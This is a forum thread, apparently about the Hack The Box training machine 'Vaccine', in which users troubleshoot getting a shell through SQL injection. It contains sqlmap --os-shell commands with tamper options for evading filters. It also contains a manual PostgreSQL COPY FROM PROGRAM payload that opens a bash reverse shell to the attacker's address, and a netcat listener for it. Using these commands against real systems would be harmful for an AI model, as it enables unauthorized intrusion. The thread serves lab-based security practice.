Machine name: vaccine stuck on getting SQL code execution shell

Type your comment> @henriqscx said:

I understand the vulnerability, thanks to the link posted by @florianges. I can also read and understand the python script. How did you learn about dashboard.php?

bruteforce the website. use either dirbuster, dirsearch, gobuster with a wordlist of known files/directories and it will pop up

Try the latest version of sqlmap cloned directly from github

git clone --depth 1 GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool sqlmap-dev

python3 sqlmap.py -u ‘http://10.10.10.46/dashboard.php?search=a’ --cookie=“PHPSESSID=34ql3d0nei22lo6vck50pq0fd1” --os-shell

that worked for me.

Type your comment> @BHCisc0 said:

git clone --depth 1 GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool sqlmap-dev

Thx, it works!

Hey! Vaccine seems to not be working properly, this is my nmap scan output:

Starting Nmap 7.91 ( hxxps://nmap.org ) at 2020-11-30 12:56 EST
Nmap scan report for 10.10.10.46
Host is up (0.058s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
1720/tcp open h323q931?
6000/tcp closed X11
6001/tcp closed X11:1
6002/tcp closed X11:2
6003/tcp closed X11:3
6004/tcp closed X11:4
6005/tcp closed X11:5
6006/tcp closed X11:6
6007/tcp closed X11:7
6009/tcp closed X11:9
6025/tcp closed x11
6059/tcp closed X11:59

Service detection performed. Please report any incorrect results at hxxps://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 182.54 seconds

Yesterday it was reported as down by Nmap, any idea on what’s going on?

This machine is unstable. I mean that after couple of shell operations like revshell to your machine database is collapsing.

First symptom is your revshell is disconnecting
Second stage is message from sqmap:
[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2
Third one is that even vaccine website cannot connect to database (so no cars and parameters are visible after login) neither sqlmap.

It takes about 1hr to work so leave it for 1hr untouched and then come back :slight_smile:

Hi there,

I am stuck on this box thanks to this. It is second stage:

[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

I have had the database collapse entirely e.g. no cars to display at all but that has resolved itself. I have been attacking this box for days now and it is getting tedious. I have voted to reset the box over and over again, and sometimes waited until the next day to try it again, still getting this error:

[15:29:35] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

Is there any way to manually perform the SQL injection to speed things up/bypass this error? Any suggestions would be appreciated, as I am beginning to lose my mind on this one.

ALSO: I did perform a particularly aggressive SQLmap scan which worked last night, I used:
sqlmap --flush-session --risk=3 --level=5 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,percentage,randomcase,randomcomments,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords -u ‘http://10.10.10.46/dashboard.php?search=alpha’ --cookie=“PHPSESSID:pft1e158fgiviqfnp8qs66rk6s” --os-shell

However, the scan took so long that I forgot to keep an eye on my NetCat listener, and missed my chance to spin up the reverse shell. Kicking myself for this. Does anyone have any idea why this particularly verbose scan worked as opposed to the ordinary one?

Kind regards,
slugpockets

My output is

Resetting the machine worked for me

Hello guys. So I’ve been trying everything with this same error everyone was talking about and simply I just tried instead of searching for A in the target’s website I tried other search results to generate different cookie values for example in my case I tried refreshing the index.php page and tried searching ‘S’ and then copied my cookies and was able to gain os-shell at last! Hope that helps.

there are two ways to try:
1.sqlmap with --flush-session --time-sec=20
2.Resetting the machine

Howerver,I also encountered this scene if I mannually perform the SQL injection first then Sqlmap won’t show as vulnerable when scanned again.I must reset the machine. why?

Guys I was stuck at sqlmap not giving me the shell and after trying many things, a simple sudo sqlmap gave the expected result, so try that too if you have trouble too!

thanks, that help me a lot and solve my problem!

For those who are still can’t get sqlmap to work here is a manual method to spawn a shell.

  • Payload
x'; COPY cars FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/{YOUR_IP}/7777 0>&1"' --

YOUR_IP is your machines ip (if using open vpn use tun0 interface’s ip)
Note: cars here is valid table in database. Database schema and table names can be exfiltrated through various SQLI techniques

  • Listner
nc -nvlp 7777

I also got stuck on this machine. The answer was using:
└─$ sudo ufw allow from 10.129.162.124 (The HTB IP) proto tcp to any port 443

Took me forever to figure out.
Just triple check your ports are allowed, I swore to myself that I already opened the port.
Very easy moving forward after this.

Have you guys been able to manually do the SQLi? I tried to but I always get ERROR: unterminated quoted string at or near “'”. I wasn’t able to find columns.

Hey guys, is a little bit later but I also have the same problem qith the sql injection. Reading the answers above i discovered the flags “–flush-session --time-sec=20” put this at the end of your SQLi command

sqlmap -u 'http://10.129.17.7/dashboard.php?search=' --cookie='PHPSESSID=4hggvt0i079k2pdv0ofvsfppd0' --os-shell --flush-session --time-sec=20